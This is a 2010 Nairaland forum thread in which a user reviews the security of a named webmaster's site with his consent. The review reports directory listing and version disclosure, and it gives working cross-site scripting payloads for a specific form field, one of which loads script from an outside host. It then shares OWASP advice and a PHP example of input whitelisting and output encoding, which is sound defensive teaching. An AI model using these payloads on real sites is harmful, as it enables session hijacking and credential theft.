Security Alert (Nairaland Forum, Webmasters section)
Security Alert by Nobody: 4:41pm On Sep 21, 2010
Please, Nairaland site owners and webmasters, tighten up security; a lot of hackers these days are not smiling, mostly these script kiddies! Ensure your contact area and most forms mail the values to your email rather than save them in a database, and if you decide to make use of a database for most applications, tighten up security! I received 1700 attempted tries to hack my site with various scripts and calls to major hack sites, using their precoded scripts! All hit my Inbox rather than my database! Currently battling deleting those junks and improving my security, based on studying the pattern employed. Also try reading some security advice proffered in this thread https://www.nairaland.com/nigeria/topic-513276.0.html
Re: Security Alert by Nobody: 6:28pm On Sep 21, 2010
Well, apart from that, I've been getting weird messages from females that they saw my profile on Nairaland and wanted to know me. At first I believed it, but after like 10 emails like that, I know yahoo yahoo boys are at work, because I have never gotten that amount of babes on my case. It's not realistic; logical reasoning.
Re: Security Alert by Nobody: 7:26pm On Sep 21, 2010
@PC, you too like woman jor. How you go believe that kind rubbish? I receive one like that yesterday, I delete am sharp sharp. Serious, I think I know the person that tried hacking me; I will send him a serious mail now. If him try that kind thing again, I go show am say I be Benin Man. Before then, I go go warn him Papa! Since na Script Kiddie! **sMileZ**
Re: Security Alert by Slyr0x: 10:38pm On Sep 21, 2010
lool, you might be right about everything, but did you say 'Script Kiddie'? To start with, your site --> http://www.marknollis.com/ is as vulnerable as hell. I can help with a Full Disclosure (that's if you want one) or perhaps post the disclosure after you've got everything patched! BTW, the thread https://www.nairaland.com/nigeria/topic-513276.0.html doesn't seem to say anything about the method of attack.
Re: Security Alert by Nobody: 10:52pm On Sep 21, 2010
Bros, feel free, it's for learning and improvement na! Oya, review the security!
Re: Security Alert by Slyr0x: 11:47pm On Sep 21, 2010
1.) To start with, directory listing is allowed on the web server:
    /scripts /images /css /js /chrometheme /chromejs/ /freebies /icons
2.) GET /checklogin.php discloses the Apache version/PHP version/OpenSSL version/FrontPage version in its headers:
    Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
    X-Powered-By: PHP/5.2.14
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
Now it's getting serious: a lookup in a vulnerability DB of the version of Apache being used will reveal how to exploit it.
3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, data entered in the 'input' field will be cached by the browser, which anyone who has access to it can steal.
4.) Now this is the greatest of 'em; it's called Cross Site Scripting. XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. Now if you don't know the impact of XSS, you can read 'em here:
    http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html
    http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf
- Theft of Accounts / Services
- User Tracking / Statistics
- Browser / User exploitation
- Hi-jacking users' active session
- Changing the look of the page within the victim's browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
- and countless others

Mode of Attack - XSS
URL: http://marknollis.com/student.php
POST /apply_details.php
In the "Fill your name" field, copy & paste this <SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT> and click on 'Apply Now'. You'll have the image below. Now you can do anything imaginable; I can call my site / call a javascript. Let's use http://ha.ckers.org/xss.js as an example; the javascript being called here is xss.js. Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2. I can even load my blog on the page <iframe src=http://codename-intrusion..com <
Re: Security Alert by Slyr0x: 11:51pm On Sep 21, 2010
NL's spam bot just ate my review.
Re: Security Alert by 5lyr0x: 12:16am On Sep 22, 2010
The NL SpamBot just ate up the review again + my posting privileges. The concluding part: http://pastebin.com/YC2PgJs6
Re: Security Alert by Nobody: 1:13am On Sep 22, 2010
Thanks.
Re: Security Alert by Nobody: 1:15am On Sep 22, 2010
Forgot to strip off tags. Generally the validation was poor! Thanks once again!
Re: Security Alert by Nobody: 1:21am On Sep 22, 2010
Now, how can I solve problems one and two? Guess from the host. As for the permission of script, no mind me: when I wrote the code, I forgot to strip script tags. Have done that now. Please try and feed me back! Thanks Oga
Re: Security Alert by 5lyr0x: 2:05am On Sep 22, 2010
Donpuzo: Yeah.
Donpuzo: Nothing has changed. I was able to inject the page.
Donpuzo: Yeah, Slyr0x. I'm having issues with that username. Can you please help me put pressure on the MODs?
Got this somewhere:
[Quote] The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server. Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input. [/Quote]
Use this article --> http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
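One way to apply the quoted advice to the name field that the review above showed echoing a <SCRIPT> tag back to the browser: whitelist validation on input, then HTML encoding on output. This is an added example, not the site's own code; the function names are hypothetical and it assumes PHP 7 or later.

```php
<?php
// Added example, not the site's own code: the "Fill your name" field that
// the review showed echoing <SCRIPT> back to the browser, handled the way
// the quoted advice says. Function names are hypothetical; assumes PHP 7+.

// Vulnerable pattern: the posted value goes straight into the HTML, so the
// browser treats a <SCRIPT> tag in the name as markup and runs it.
function render_unsafe(array $post): string
{
    return '<p>Thanks, ' . $post['name'] . '. Your application was received.</p>';
}

// Step 1, input: validate against a whitelist of expected characters for a
// name (letters, spaces, apostrophes, hyphens; 2 to 60 chars). Reject on
// failure instead of trying to "strip" bad parts, which is easy to bypass.
function validate_name(string $name): ?string
{
    $name = trim($name);
    return preg_match('/^[\p{L}\' -]{2,60}$/u', $name) === 1 ? $name : null;
}

// Step 2, output: encode for the place the value lands, here HTML text.
// htmlspecialchars turns < > & " ' into entities, so whatever survived
// validation is displayed as text rather than interpreted by the browser.
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(array $post): string
{
    $name = validate_name($post['name'] ?? '');
    if ($name === null) {
        return '<p>Please enter a name using letters, spaces, apostrophes or hyphens.</p>';
    }
    return '<p>Thanks, ' . html_text($name) . '. Your application was received.</p>';
}

// Constructed sample request bodies; the first has the shape of the review's payload.
$attack = ['name' => '<SCRIPT>alert(1)</SCRIPT>'];
$normal = ['name' => "Mark O'Brien"];

echo render_unsafe($attack), PHP_EOL;  // the script tag reaches the browser intact
echo render_safe($attack), PHP_EOL;    // rejected by the whitelist
echo render_safe($normal), PHP_EOL;    // apostrophe arrives as &#039;
```

The encoding step is the one that matters even when validation is loosened (a comments field, say), since it is tied to the output context rather than to guesses about what input looks like.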